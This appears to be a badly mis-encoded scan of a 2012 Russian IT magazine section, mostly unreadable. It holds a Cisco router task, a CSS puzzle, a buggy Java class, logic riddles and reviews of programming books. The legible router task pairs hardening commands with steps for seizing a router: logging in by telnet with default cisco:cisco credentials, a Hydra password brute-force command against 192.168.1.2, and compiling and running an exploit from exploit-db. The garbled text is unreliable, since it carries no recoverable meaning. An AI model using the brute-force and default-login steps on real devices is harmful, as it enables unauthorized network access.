3#1#0 ,&26(= 5&" -9%*% 98 %: ") 3#1#0 ,&26(8; ,&"=.

A)0%. #91)4#., '&1&4 0)5,8& 3-(0%, 0#(#18& +1#D*% 9&4 -9%;3(2 .-5'%", 3()"#2%(36 #9F&+#"6("#; %3(%"#;, '(# 0#*%-'&3(2# $-*6F%: .-5'%" 3()*# 9#*=D& ") &,%"%@-. G# (&: +#1, +#0) >(# #9F&+1%"6(#& 4")"%& "& +1&283%( '%3*#, 0#(#1#& 4")&( 5&"F%"). H(# 9-,&( #4")')(=, '(# %4.&"6&( && .-5, % #") -9=&( &$#. B(2&(: 2 +&128& 49 ,"&; "%'&$# "& +1#%4#;,&(, ) ") 50-; ,&"= 3*-'%(36 01#2)2)6 9#;"6.

!"#"$" % 3 IJKBLEM L# 21&.6 +1#2&,&"%6 +&"(&3() 2). 2 1)3+#165&"%& +1&,#3()2*&"# #9#1-,#2)"%& Cisco ") 9)4& IOS. N),)') — .)03%.)*="# 983(1# #9-")1-5%(= -642%.#3(% 2 #9#1-,#2)"%%. B+%D%(& +#3*&,#2)(&*="#3(= 2)D%: ,&;3(2%; (2 (#. '%3*& 28+#*"6&.8: 0#.)",), 0#(#18& +#-42#*6( 2862%(= .)03%.)*="#& 0#*%'&3(2# 2#4.#5"8: -642%.#3(&; 2 +1&,#3()2*&""#. #9#1-,#2)"%%. ?1%.&')"%&: 28 #9*),)&(& +#*"8. ,#3(-+#. 0 -0)4)""#.- #9#1-,#2)"%/.

OMPM<EM !"# $%&'()*+&,# )#-.,/$01+2 0"+3)+1 .45$"&,16 7+14(+ &+-'1+2",.48 3+201.,#:1. B+1&,&*%(= 2&13%/ #9#1-,#2)"%6 (>(# #98'"# ")+%3)"# ") 0#1-

+-3& -3(1#;3(2)).2. ?#%30)(= 2 %"(&1"&(& 3-F&3(2-/F%& -642%.#3(% ,*6 #+1&,&-

*&""#; 2&13%% #9#1-,#2)"%6 (")+1%.&1, 4)+1#3 2 google.com: «I642%.#3(% Cisco 2600»).

3. B+1&,&*%(= 2&13%/ IOS. ?1% +#,0*/'&"%% 0 #9#1-,#2)"%/ Cisco 28,)&(36 3##9F&"%& # 2&13%% #+&1)@%#"0%, ")+1%.&1:

Cisco Internetwork Operating System SoftwareIOS (tm) C2600 Software (C2600-IS-M), Version 12.3(3),RELEASE SOFTWARE (fc2)

A)05& .#5"# -4")(= 3 +#.#F=/ 3*&,-/F&; 0#.)",8:

>show version

4. ?#%30)(= 2 %"(&1"&(& 3-F&3(2-/F%& -642%.#3(% ,*6 #+1&,&-*&""#; 2&13%% IOS (")+1%.&1, 4)+1#3 2 google.com: «I642%.#3(% Cisco IOS 12.0», ()05& %F&. 3##9F&"%6 9&4#+)3"#3(% ") 3);(& +1#%42#,%(&*6 — cisco.com).

!"# )01('&+&,# )#-.,/$01+2 /$*&$ 5($3+"'16 0"+3)9:,+ ;'<,:1. M3*% &3(= 2#4.#5"#3(=, (# #9"#2%(= 2&13%/ IOS:

show fl ashdelete fl ash: OS.bincopy tftp fl ashreload

2. I3()"#2%(= 21&.6:

>enable#clock set 18:41:10 18 jul 2012

3. J.&"%(= +)1#*= +1%2%*&$%1#2)""#$# % +#*=4#2)(&*=30#$# 1&5%.#2 3 D%C1#2)"%&.:

>enable#confi g terminal(confi g)#enable secret ǯǠǰǮǫǼ1(confi g)#service password-encryption(confi g)#line aux 0(confi g-line)#login(confi g-line)#password ǯǠǰǮǫǼ2(confi g-line))#line console 0(confi g-line)#login(confi g-line)#password ǯǠǰǮǫǼ3(confi g-line))#line vty 0 0(confi g-line)#login(confi g-line)#password ǯǠǰǮǫǼ4(confi g-line)#no service password-encryption(confi g-line)#/v Z

4. J#:1)"%. 0#"C%$-1)@%/, ,*6 && 4)$1-40% +&1&, 4)+-30#.

#running-confi g startup-confi g

5. B(0*/'%. -+1)2*&"%& '&1&4 HTTP, HTTPS, CDP:

(confi g)#no ip http server(confi g)#no ip http secure-server(confi g)#no cdp run

6. <)3(1#%. !JH 3##(2&(3(2-/F%. #91)4#., "%5& +1%.&1 4)+1&() FTP-(1)C%0):

#access-list 110 deny tcp any any eq ftp

!"# .4#."+&,# )#-.,/$01+2, ' 5$5($01) <$.$(# .-"$/' &';+<$ 3+.'20' /$*&$ 03+"'16 0"+3)9:++.1. L4*#.)(= 21-'"-/ %*% %3+#*=4-6 +1#$1)..8. ?1#9-&. +#,0*/-

'%(=36 +# telnet:

>telnet 192.168.1.2

% 22&3(% *#$%"-+)1#*=, 4),)""8& +# -.#*')"%/ (Cisco:Cisco). M3*% "& +#.#$*#, (# +1#9-&. .&(#, bruteforce: .#5"# +&1&91)(= +)1#*% ,*6 telnet, %3+#*=4-6 THC-Hydra. <)+1%.&1, ()0:

hydra 192.168.1.2 cisco -P ./ȥȣȜȥȢȞ-ȣȔȤȢȟșȝ -t 30

2. <);(% % 30)')(= >03+*#;(8 ,*6 3##(2&(3(2-/F&$# 2%,) IOS. G*6 >(#$# .#5"# 3,&*)(= 4)+1#3 (%+) «IOS 12.0 exploit». A)05& .#5"# 2#3+#*=4#2)(=36 +#%30#. +# 3);(). 3 >03+*#;().% (")+1%.&1, ") exploit-db.com) %, 3*&,-6 +1%*)$)/F%.36 0 "%. %"3(1-0@%6., 2#3+#*=4#2)(=36 -642%.#3(=/. G*6 >(#$# .#5&( +#(1&9#2)(=36 0#.+%*%1#2)(= >03+*#;(. G*6 6480) J 0#.)",) .#5&( 98(= 3*&,-/F)6:

>gcc exploit.c -o exploit

?#3*& >(#$# 28+#*"%(= >03+*#;(:

>./exploit 192.168.1.2 80

K%9#, &3*% 6480 %"(&1+1&(%1-&.8;, 31)4- 28+#*"%(=. ?1%.&1 ,*6 6480) Ruby:

>ruby exploit.rb 192.168.1.2 80

!"#"$% &" '()*'*#(+"&%,-

!"#$% 09 /164/ 2012 093

!"#"$" % 4 ./01234 567&( &"8%'(+"9: 9");%<6 ' )(;:=%> ?(;%$*'9+(> '9(;)<(+. @9()A 9");%<" 6>*'9%;"': + B?8"&, C"D(;(+?% '9(;)<(+ 8*=%;% +A+(#%9: +*89%?";:-&(. E8%#6>"F9* % 8*";%C6F9* ?8('')8"6C*8&(* 8*=*&%* #;, +A+(#" +*89%?";:&A- C"D(;(+?(+. G8"6C*8A: IE6+, FF3.0+, Opera 9.5+, Chrome 4.0+.

H4I4534 1#&" %C &*>&(D%- C"#"$, D#* 8*=*&%* #;, Internet Explorer ,+;,*9', '">A> J8('9A>, — + &*>, '(D;"'&( 8*?(>*&#"<%,> W3C, 8*";%C(+"&( '+(F-'9+( writing-mode. K86D%* 8"C8")(9$%?% (9;%$%-;%': ?"7#AF J(-'+(*>6 — + Firefox *'9: '+(F'9+( -moz-transform, Opera J8*#;"D"*9 %'J(;:C(+"9: -o-transform, &6 " 8"C8")(9$%?% #+%7?" Webkit ((& J8%>*&,*9', + )8"6C*8"- Safari % Chrome) J8%-#6>";% -webkit-transform.

/;*#6LM", J8();*>" J(#'9*8*D"*9 &"' + )8"6C*8"- Firefox, Opera 10.51, Safari 3.5, Chrome: J8% J(+(8(9* 9*?'9" J(+(8"$%+"*9', % '"> );(? ' 9*?'9(> 9"?%> ()8"C(>, $9( #;%&" % =%8%&" );(?" >*&,L9', >*'9">%. N*?'9 >(7*9 C"*-"9: &" +A=*- % &%7*'9(,M%* );(?%. E(B9(>6 ';*#6*9 J8*#6'>(98*9: C">*&6 #;%&A &" =%8%&6 J(';* 98"&'O(8>"<%% 9*?'9".

3 &"?(&*<, ?(',? '( '9"8A>% )8"6C*8">% — Opera +*8'%% &%7* 10.51 % Firefox +*8'%% &%7* 3.5. E8%#*9', (9;"+;%+"9: B9% )8"6C*8A ' J(>(M:L JavaScript % J(+(8"$%+"9: 9*?'9 ' J(>(M:L SVG. E('?(;:?6 + SVG &*9 "+9(>"9%$*'?(D( J*8*&('" '98(?, J(+*8&69AF 9*?'9 )6#*9 + (#&6 '98(?6. P9( J8%#*9', 6$*'9: % #%&">%$*'?% %C>*&%9: 8"C>*8 );(?" 9"?, $9()A 9*?'9 &* ()8*C";',. 1?(&$"9*;:-&(* 8*=*&%* +AD;,#%9 ';*#6LM%> ()8"C(>:

1. !"#$ #%&'()% M *% N. + ',-./ -,01*,/ 2',#2, (1, 1) *%1.3(#"4 560%-,/. 7% .3(* 1.3 560%-,/ 5.8,# 9,0,3-(:%#$"4 '(&. *% .3*6 2',#26 -*(;, '(&. *% .3*6 2',#26 -90%-.. <%9(=(#, 90.:0%556, 2.#.0%4 ">(#%,# 2.'(>,"#-. -",1 96#,/ 560%-$4 (; #.>2( (1, 1) - #.>26 (M, N).

2. ?&@,2#A 2'%""% ObjectWithHash 90,39.'%-:%,#"4 ("9.'$;.-%#$ - 2%>,"#-, 2'B>,/ 3'4 HashMap. C2%8(#, -", .=(&2( - 3%**.5 2.3,:

public class ObjectWithHash { int id; public void setId(long id) { id = id; }

private int hashCode() { return generateHashCode(); }

protected int generateHashCode() { Integer seed = Math.random() < 10f ? null : 700; return new Random(seed).nextInt(); } public boolean equals(ObjectWithHash obj) { if (obj.id == id) return true; return false; }}

3. D,#A0, ".&%2( *%1.34#"4 - 6:'%1 &.'$=.:. 2-%30%#%. E%83%4 (; ".&%2 *%>(*%,# 90,-"',3.-%#$ 306:6B ".&%26, 0%"9.'.8,**6B .# *,, 9. 1.36 >%".-./ "#0,'2(. +", ".&%2( &,:6# " .3(*%2.-./ "2.0."#$B, 90(>,5 .*( 9."#.4**. 5,*4B# *%90%-',*(, "-.,:. 3-(8,*(4 #%2, >#.&A 90,"',3.-%#$ "#0.:.

9. 9045./ #6 ".&%26, ;% 2.#.0./ :.*4#"4. F2.'$2. -0,5,*( 90./3,#, 9.2% ".&%2( 9./5%B# 306: 306:%? G3, H#. 90.(;./3,#?

4. I; J."-K*38,',"% - <$B-L.02 .#90%-'4-,#"4 9.,;3 " 9."#.4**./ "2.0."#$B 15 5('$ - >%". ?3*.-0,5,**. (; <$B-L.02% - J."-K*38,'," 9. #.56 8, 96#( .#90%-'4,#"4 -"#0,>*A/ 9.,;3 ". "2.0."#$B 20 5('$ - >%". + #.# 8, "%5A/ 5.5,*# (; J."-K*38,',"% " -.2;%'% -A',#%,# 9#()% ( ',#(# "#0.:. *%3 8,',;*.3.0.8*./ 2.',,/ 9. *%90%-',*(B 2 <$B-L.026 ". "2.0."#$B 25 5('$ - >%". E%2 #.'$2. .*% 3.',#%,# 3. 9.,;3%, -A=,3=,:. (; <$B-L.02%, .*% *,5,3',**. 0%;-.0%>(--%,#"4 ( ',#(# - .&0%#*6B "#.0.*6 " #./ 8, "2.0."#$B, 9.2% *, -"#0,#(#"4 " 9.,;3.5, -A=,3=(5 (; J."-K*38,',"%, 9."', >,:. "*.-% 0%;-.0%>(-%,#"4 ( ',#(# - .&0%#*.5 *%90%-',*((. M%2 .*% ',#%,# #63% ( .&0%#*. 5,836 3-654 9.,;3%5(, 9.2% .*( *, "#.'-2*6#"4. E%2., 0%""#.4*(, 90.',#(# 9#()%?

! "#$%&'($) !*+&",$

-./.01. 2343561 7 0.89:50:;1 <39=1>3;1

!"#$%& !"#$% &'(')*+, *+,$+$"--"./"'%%*0# DevExpress (tabalinas@gmail.com)

'(!)* 09 /164/ 2012094

!"# $% &'#(')"*+ &+*,$)#$: -.+/% ".).0 &'+1#"",+*)20*%$ &'+3')$$,".+$, *#+/4+5,$+ -,.).0 "&#6,)2,7,'+8)**9: .#4*,-#"(9: 2,.#').9'9. ;+ *) "#3+5*<=*,> 5#*0 5+".9&*+ +3'+$*+# (+2,-#".8+ ')72,-*%4 ,75)*,> &+ &'+3')$$,'+8)*,:. ?#2+> @,7*, *# 48).,., -.+/% +5+2#.0 , &+2+8,*9 ,7 *,4. A)(,# @# (*,3, *9@*+ -,.).0 8 &#'89: +-#'#50? B#7 ()(,4 (*,3 *#207< +/+>.,"0? ! C.+> ".).0# $% ')""()@#$ + .#4 .'95)4 8#2,(,4 )8.+'+8, " (+.+'%$, 5+2@#* /%.0 7*)(+$ ()@5%> &'+1#"",+*)20*%> ')7')/+.-,(.

!"#$%&' (%)! * (*+)%!,!" #$%&'( )*$+!,-,. /-&#01, /,$ 2+!,-', 2'34 )*$5*-66!2,$6!

INFO

1 2#.3 0#'#4$ %5 "'00%.#"$)* +$ 60$ 7+*/* *8 8.).#./. 9.+:' -"./"'%%$"07.3 %50)*. ;)$:<=><= -.:(."7< 7+*/ #5 +'3:$?4 6 .7#@("407.% +.%$"$ ][.

6

6 !"#$%&' (%)! * (*+)%!,

!"#$% 09 /164/ 2012 095

"*-%* %#./) !010 21*!1#3-3)1*$#%)4, (*/*1&. %, 5)/#" «6*$,17,%%&. (*+» 6/)$#

8#((*%%,""#. 9,.:/$)/,";%*, *+%# (%)!#, '*/; ) %,3#",%;(#4 (50/; 3,%,, 900 :/1#%)<), 2*(1&$#,/ 21#(/)5,:() $:, #:2,(/& 1#=1#>*/() ?@: */ 1,<,2/*$ %#2):#%)4 $&:*(*(#5,:/$,%%*!* (*+#, 3,'#%)=3*$ /,:/)1*$#%)4 ) */"#+() +* :/1#/,!). *2/)3)=#<)) (*+# ) 2:)-'*"*!)5,:()' A#(/*1*$, $")4BC)' %# 1#=1#>*/(0. ?1,+:/#$; :,>,: >)>")*-!1#A)4 (%)!) =#%)3#,/ 20 :/1#%)< ) :*+,1-)/ >*",, 500 ):/*5%)(*$! D%)!# «6*$,17,%%&. (*+» — *+%* )= :#3&' 2*",=%&' ), (#( :",+:/$),, 2*20"41-%&' )=+#%). 2* 1#=1#>*/(, ?@. @%# %,*+%*(1#/%* +*(#=#"# E/*, $*=!"#$"44 1,./)%!) (%)! 2* 21*!1#33)1*$#%)B (goo.gl/3q0kx). F"#!*+#14 21*:/*. 3#%,1, )="*-,%)4, *:*>*30 :/)"B ) 50$:/$0 B3*1# 6/)$# (%)!# 5)/#,/:4 *5,%; ",!(*.

G*$*14 * 21*,(/)1*$#%)) ) (*%:/10)1*$#%)) 21*!1#33%&' :):/,3, 8#((*%%,"" $&+,"#,/ G"#$%&. H,'%)5,:(). I32,1#/)$ J#=1#>*/() ?@ — 021#$",%), :"*-%*:/;B. ?1*:/*/# ) 4:%*:/; ):'*+%*!* (*+# ) #1')/,(/01& :):/,3& *21,+,"4B/ ,, (#5,:/$*. F*";7#4 5#:/; (%)!) 2*:$4C,%# %#2):#%)B $&:*(*(#5,:/$,%%*!* (*+#. 8#((*%%,"", (#( %)(/* +10!*., *:*=%#$#4 =%#5)3*:/; 3,"*5,., +,/#";%* *2):&$#,/ $:, 21#$)"#, (*/*1&3) :",+0,/ 10(*$*+:/$*$#/;:4 21) %#2):#%)) '*1*7,-!* (*+#. K,*>'*+)3&. 01*$,%; #>:/1#(<)), 1#=1#>*/(# (#5,:/$,%%&' )%/,1A,.:*$ ("#::*$, %#2):#%), $&:*(*(#5,:/$,%%&' 3,/*+*$, $&>*1 0+#5%&' )3,% 2,1,3,%%&' — %)5/* %, 0:(*";=#,/ */ $%)3#%)4 #$/*1#. K#21)3,1, *>C)3 21)%<)2#3 ):2*";=*$#%)4 2,1,3,%%&' */$,+,% <,"&. 1#=+," (%)!) >*",, 5,3 %# 100 :/1#%)<. ?1) E/*3 $:, 21#$)"# ) :*$,/& +#B/:4 ):("B5)/,";%* : 21#(/)5,:(*. /*5() =1,%)4.

8#((*%%,"" A*130")10,/ G"#$%&. L#(*% D#5,:/$# ?@: 2*$&7,%), (#5,:/$# :):/,3& :%)-#,/ 1#:'*+& %# ,, 1#=1#>*/(0. ?1)5)%# 4:%# — >*";70B 5#:/; $1,3,%) 21*!1#33):/& =#%)3#B/:4 5/,%),3 ) */"#+(*. %#2):#%%*!* (*+#, /*!+# (#( %# :*>:/$,%%* %#2):#%), 0'*+)/ *(*"* 10% 1#>*5,!* $1,3,%). ?*E/*30 2*++,1-#%), (#5,:/$# (*+# :):/,3& %# $&:*(*3 01*$%, E(*%*3)/ 3%*!* $1,3,%) ) /,3 :#3&3 2*$&7#,/ D?9 21*!1#33):/#.

M$/*1 %, *>'*+)/ $%)3#%),3 ) 1#=")5%&, 3,/*+)() 1#=1#>*/(). ?*+-1*>%* *2):&$#,/:4 2#1%*, 21*!1#33)1*$#%),, 1,$)=)) (*+#, 1#=1#>*/(# %# *:%*$, /,:/)1*$#%)4. «J,A#(/*1)%!» — ,+)%:/$,%%#4 !"#$# (%)!), (*/*10B 3*-%* %#=$#/; «:"#>*$#/*.». ?1) 1#::3*/1,%)) 3,/*+*$ 1,A#(-/*1)%!# 21)$*+)/:4 ")7; +")%%&. :2):*( ,!* $)+*$ )= (%)!) 8. N#0",1# «J,A#(/*1)%!». ?1) E/*3 %,/ %) *+%*!* (*%(1,/%*!* 21)3,1# (*+#.

G*$*14 * 2*$&7,%)) 21*)=$*+)/,";%*:/) ?@, #$/*1 21)$*+)/ 0>,+)-/,";%&, +*$*+& 21*/)$ 21,-+,$1,3,%%*. *2/)3)=#<)), (*!+# 21*-!1#33):/ $ 21*<,::, 1#=1#>*/() )%/0)/)$%* 1#:2*=%#,/ «0=(),» 3,:/# $ 21*!1#33, ) %,=#3,+")/,";%* 21)%)3#,/ 3,1& 2* *2/)3)=#<)) $ 0C,1> (#5,:/$0 (*+#. ?1)$*+)3#4 :/#/):/)(# 2*(#=&$#,/, 5/* $ 9 )= 10 :$*)' 21,+2*"*-,%). 21*!1#33):/ *7)>#,/:4.

?*+$,:/) )/*!) 3*-%* :"*$#3) 9-*%# J*>>)%:#: «O/* 21*:/* :#3#4 "057#4 (%)!# 2* (*%:/10)1*$#%)B ?@ )= $:,', 5/* (*!+#-")>* 2*2#+#-"):; 3%, $ 10(). D#-+&. 1#=1#>*/5)( +*"-,% )3,/; ,, ) 2,1,5)/&$#/; */ (*1() +* (*1() (#-+&. !*+. P ,-,!*+%* 2,1,5)/&$#B ,, %# 21*/4-,-%)) $*/ 0-, +,$4/) ",/ ) $:, ,C, 0=%#B 3%*!* %*$*!*!»

6. 8#((*%%,""

«!"#$%&$''() *"+»&'(')* +,- ).+, +.+ /0-), 1,23,4,5-.)6 *7, /0-*) 1+8,99:; + 9.1'8'< 21'=,2.), +,),3:; >9.*), 7-* 4: 5'4*)*.

8. N#0",1

«,$-.*/"%0'1»?.2'1.)6 +,-, 2,9@)9:; +,A26<)*30, A,5*) +.5-:;, 9, ),86+, =,3,('* 23,73.AA'1): 2'(0) +,-, 2,9@)9:; 8<-@A.

1#(/)5,:() "B>*, )=+#%), * 1,A#(/*1)%!, ::&"#,/:4 %# (%)!0 8#1/)%# N#0",1#

«J,A#(/*1)%!». ?1)5)%# 4:%#: $ E/*. (%)!, N#0",1 :+,"#" %,$*=3*-%*, — $ 21,+,";%* 2*%4/%*. A*13, +*%,: +* 5)/#/,",. ):5,12&$#BC,, *2):#%), 2*%4/)4 «1,A#(/*1)%!», 1#:(1&" ,!* %#=%#5,%),, *:*>,%%*:/) ) 3,/*+& 1,#")=#<)).

?1) %,3#"*3 *>Q,3, (400 :/1#%)<) (%)!# 5)/#,/:4 >0($#";%* =# 2#10 $,5,1*$, */ %,, 21*:/* %,$*=3*-%* */*1$#/;:4. G"#$%#4 21)5)%# !*"*-$*(10-)/,";%*!* 0:2,'# (%)!) — ,, 21#(/)5,:(#4 %#21#$",%%*:/;. R:, 3& =%#,3, 5/* :#3#4 :"*-%#4 =#+#5# 21) 2*+#5, 3#/,1)#"# — 21)$,:/) '*1*7). 2*(#=#/,";%&. 21)3,1. R E/*3 N#0",10 %,/ 1#$%&'. D%)!# %#5)-%#,/:4 : 21)3,1# 0"057,%)4 (*+#(*+# — ) E/*/ 21)3,1 :1#=0 : !*"*$*. =#/4!)$#,/ 5)/#/,"4 $ 3)1 1,A#(/*1)%!#. R:,!* 40 :/1#%)< +#B/ %#3 $2*"%, (*%(1,/%*, 21,+:/#$",%), * 1,A#(/*1)%!,, ,!* <,"4', 21)%<)-2#' ) *:%*$%&' 3,/*+#' 1,#")=#<)).

8#1/)% *21,+,"4,/ 1,A#(/*1)%! (#( «)=3,%,%), $* $%0/1,%%,. :/10(/01, ?@, )3,BC,, <,";B *>",!5)/; 2*%)3#%), ,!* 1#>*/& ) 021*-:/)/; 3*+)A)(#<)B, %, =#/1#!)$#4 %#>"B+#,3*!* 2*$,+,%)4». K* (*!+# %,*>'*+)3* 21*$*+)/; +#%%*, )=3,%,%),? D#(*. (*+ +*"-,% 2*+$,1-!#/;:4 2,1,1#>*/(,? M$/*1 +#,/ 2*+1*>%&, */$,/& %# E/) $*21*:&. @% $$*+)/ 21#$)"* «/1,' 0+#1*$»: «?*:", /1,' 0+#1*$ %#5)%#./, 1,A#(/*-1)%!». H* ,:/; (*!+# $& +,"#,/, 5/*-/* #%#"*!)5%*, $ /1,/). 1#=, E/* :)!-%#" +"4 %#5#"# 1,A#(/*1)%!#. J#=+," «D*+ : +07(*3» +#,/ %#3 5,/(*, 21,+:/#$",%), * /*3, (#(*. -, (*+ /1,>0,/ 0"057,%)4. D 21)=%#(#3 /#-(*!* (*+# */%*:4/:4: +")%%&. 3,/*+, >*";7*. ("#::, +0>")1*$#%), (*+#, +")%%&. :2):*( 2#1#3,/1*$ 3,/*+#, $1,3,%%&, 2*"4 ) 3%*!*, +10!*,.

N#0",1, (#( :/*1*%%)( TDD (Test-driven development), 2*:$4C#,/ !"#$0 (%)!) :*=+#%)B #$/*3#/)5,:()' /,:/*$ ) *2):#%)B :1,+& JUnit. ?,1,+ 21*$,+,%),3 1,A#(/*1)%!# :",+0,/ %#2):#/; /,:/ +"4 0"057#,-3*!* (*+#, 5/*>& *>,:2,5)/; %,)=3,%%*:/; ,!* 2*$,+,%)4, ) /*";(* 2*:", E/*!* :3,"* $%*:)/; )=3,%,%)4.

F*";70B 5#:/; (%)!) =#%)3#,/ (#/#"*! 3,/*+*$ 1,A#(/*1)%!#. @% :*+,1-)/ 1#=+,"&, 2*:$4C,%%&, :*:/#$",%)B 3,/*+*$, 2,1,3,C,%)B A0%(<). 3,-+0 *>Q,(/#3), *1!#%)=#<)) +#%%&', 021*C,%)B 0:"*$%&' $&1#-,%). ) $&=*$*$ 3,/*+*$, 1,7,%)B =#+#5 *>*>C,%)4 ) (102%&3 #1')/,(/01%&3 1,A#(/*1)%!#3. 8%*!), )= 3,/*+*$ 1,A#(/*1)%!# #$/*-3#/)=)1*$#%& $ 2*20"41%&' IDE. K#21)3,1, Visual Studio 21,+*:/#$"4,/ $*=3*-%*:/) 2* #$/*3#/)5,:(*30 $&+,",%)B 3,/*+# (ExtractMethod), 0+#",%)B 2#1#3,/1# (RemoveParameter), $&+,",%)B )%/,1A,.:# (ExtractInterface) ) +1. R (#5,:/$, (102%&' 1,A#(/*1)%!*$ 01*$%4 :):/,-3& N#0",1 21)$*+)/ :",+0BC),: 1#=+,",%), ),1#1')) %#:",+*$#%)4, $&2*"%4BC,. >*",, *+%*. =#+#5), 2,1,'*+ */ 21*<,+01%*!* 2*+'*+# ( *>Q,(/%*-*1),%/)1*$#%%*30, */+,",%), 21,+3,/%*. *>"#:/) */ 01*$%4 21,+:/#$",%)4, # /#(-, $&+,",%), ),1#1')), 2*+1#=03,$#BC,, 1#=->),%), >*";7*!* ("#::# %# <,"0B ),1#1')B =%#5)/,";%* 3,%;7)' 2* 1#=3,10 ) >*",, :2,<)#")=)1*$#%%&' 2*+("#::*$.

?1*5)/#$ E/0 (%)!0, >*";7)%:/$* 21*!1#33):/*$ )=3,%4,/ :$*. 2*+-'*+ ( %#2):#%)B (*+#. @%) :/#%*$4/:4 >*",, !1#3*/%&3), #((01#/%&3) ) $%)3#/,";%&3) ( :$*,30 /$*1,%)B. D%)!# *>4=#/,";%# ( 21*5/,%)B +"4 $:,' 21*!1#33):/*$, :/1,34C)':4 ( :*$,17,%:/$0 $ :$*,3 1,3,:",.

B &

!"#$%&

'(!)* 09 /164/ 2012096

!. "#$$#, %. &'($, %. )*+,-+,, ). .(/--/0'-

«!"##$%&' (%)$*#+%),"&+-»!"#$%&'"#()*'$ #+,$%&*#-#"'$*&'"#()**-. /"#0")11 — *$2$0%#$ 3$2#, ) $42' '. *56*# '4/#278#()&7 /#(&#"*#, &# (4$ 4&)*#('&49 $:$ 42#6*$$.

12+-/3' 4 +153,+6+ 2#7-2#8+39/:#, :#:4; :,/64 1+ +8<':3,+-+2/',3/2+=#,,+$4

12+62#$$/2+=#,/; =#$ +8>7#3'(?,+ -3+/3 12+9/3#3?. . #8-+(;3,+$ 8+(?-@/,-3=' -(49#'= +, 1+-+='34'3 /$',,+ A34. . +3,+@',// 0#,,+B :,/6/ -(+=+ «8'-3-'(('2» 7=49/3 ,'0+-3#3+9,+ =5-2#7/3'(?,+, ='0? - $+$',3# '' =514-:# 85(+ 12+0#,+ 4*' 8+('' 1+(4$/((/+,# A:7'$1(>2+=.

C9',? 9#-3+ ,#9/,#;D/B 2#72#8+3-9/: -#$+-3+>3'(?,+ 8'2'3-> 7# 2'@',/' 4*' 8+('' 35->9/ 2#7 2'@',,+B 0+ ,'6+ 7#0#9/ 12+':3/2+=#,/> / /7+82'3#'3 +9'2'0,4; 2#7,+=/0,+-3? 1>3/:+-('-,+6+ ='(+-/1'0#, /-3/,,+ 6+20>-? -=+/$ «,+=@'-3=+$». .(#0',/' >75:+$ 1#33'2,+= 1+7=+(>'3 2'@/3? $,+*'-3=+ 7#0#9 12+':3/2+=#,/> ,#/8+('' +13/$#(?,5$ -1+-+8+$, 7#32#9/=#> 12/ A3+$ $/,/$4$ 4-/(/B. .-'6+ 0=#0E#3? +1/-#,,5F = :,/6' 1#33'2,+= 12'0+-3#=(>;3 /,-324$',3#2/B 0(> 2'@',/> +62+$,+6+ -1':32# 7#0#9 12+':3/2+=#,/> GC.

H#3'2/#( :,/6/ 0+=+(?,+ -(+*', / 32'84'3 +3 9/3#3'(> +12'0'(',-,5F 7,#,/B = +8(#-3/ +8<':3,+-+2/',3/2+=#,,+6+ 12+':3/2+=#,/>. )(> +-=+',/> 1#33'2,+= ,'0+-3#3+9,+ 12+-3+ 12+9/3#3? :,/64, ,'+8F+0/$+ +-,+=#3'(?,+ ,#0 ,'B «1+1+3'3?». .12+9'$, 3=+/ 4-/(/> ,' 12+B043 0#2+$. I,/6# -+0'2*/3 350 -32#,/E / -+-3+/3 /7 0=4F 9#-3'B. . 1'2=+B 9#-3/ 0#'3-> +8D'' 1+,>3/' 1#33'2,+= 12+':3/2+=#,/>, +1/-5=#'3-> /F 12#:3/9'-:+' 12/$',',/' ,# 12/$'2' -+70#,/> =/74#(?,+6+ 2'0#:3+2# 0+:4$',3+= Lexi. .3+2#> 9#-3? :,/6/ -+0'2*/3 :#3#(+6 1#33'2,+= - 1+0-2+8,5$ +1/-#,/'$ ,#7,#9',/>, -324:3425, +-+8',,+-3'B 2'#(/7#E// / 12/$'2#$/ 12/$',',/> :#*0+6+ 1#33'2,#.

I+((':3/= #=3+2+= /7='-3', :#: Gang of Four («J#,0# 9'352'F»), 1+A-3+$4 12'0-3#=(',,5' = :,/6' 1#33'2,5 ,#75=#;3 GoF. K=3+25 2#78/=#;3 =-' $,+*'-3=+ 12'0-3#=(',,5F 1#33'2,+= ,# 32/ 624115: 1+2+*0#;D/' 1#33'2,5, -324:342,5' 1#33'2,5 / 1#33'2,5 1+='0',/>. G+2+*0#;D/' 1#33'2,5 2'@#;3 7#0#94 /,-3#,E/2+=#,/> (-+70#,/' A:7'$1(>2+=) :(#--+=. I -#$5$ 1+14(>2,5$ 1#33'2,#$ = 0#,,+B 62411' $+*,+ +3-,'-3/ AbstractFactory (#8-32#:3,#> L#82/:#), FactoryMethod (L#82/9,5B $'3+0) / Singleton (+0/,+9:#). M324:342,5' 1#33'2,5 12'0,#7,#9',5 0(> 2'@',/> =+12+-+= :+$1+,+=:/ -/-3'$5 ,# +-,+=' :(#--+= / +8<':3+=. I ,/$ +3,+->3-> 3#:/' =#*,'B@/' 1#33'2,5, :#: Adapter (#0#13'2), Bridge ($+-3), Composite (:+$1+,+=D/:), Proxy (7#$'-3/3'(?) / Facade (L#-#0). G#33'2,5 1+='0',/> -=>7#,5 - #(6+2/3$#$/ / =+12+-#$/ 2#-12'0'(',/> +8>7#,,+-3'B $'*04 :(#--#$/. N0'-? ,'+8F+0/$+ 41+$>,43? Strategy (-32#3'6/>), TemplateMethod (@#8(+,,5B $'3+0), Observer (,#8(;0#3'(?), Command (:+$#,0#) / Iterator (/3'2#3+2).

O0/,-3=',,+', 93+ $+*'3 -$43/3? 9/3#3'(>, — ,':+3+25' 12/$'25 = :,/6' ,#1/-#,5 ,# $#(+/7='-3,+$ ,# -'6+0,>@,/B 0',? >75:' 12+62#$-$/2+=#,/> Smalltalk, # 0(> /7+82#*',/> 0/#62#$$ :(#--+= =$'-3+ 12/-=59,+6+ UML /-1+(?74'3-> OMT (Object Modeling Technique).

"424 CCK/G H#23/, P#4('2 1/@'3: «G#33'2,5 GoF — A3+ (49@#> /7 :+60#-(/8+ /70#,,5F :,/6 1+ +8<':3,+-+2/',3/2+=#,,+$4 12+':3/2+-=#,/;. !3# :,/6# 92'7=59#B,+ =(/>3'(?,# = /,04-32// 12+62#$$,+6+ +8'-1'9',/> — 3+(?:+ 1+-$+32/3' ,# 8/8(/+3':/ Java / .NET, :+3+25' 84:=#(?,+ :/@#3 1#33'2,#$/ GoF». Q' -4D'-3=4'3 -1'E/#(/-3# = +8(#-3/ +8<':3,+-+2/',3/2+=#,,+6+ 12+':3/2+=#,/>, ,'7,#:+$+6+ - 1#33'2,#$/ GoF, # '-(/ 3#:+B / '-3?, 3+ = A3+$ -(49#' '6+, -:+2'' =-'6+, ,'(?7> ,#-7=#3? -1'E/#(/-3+$.

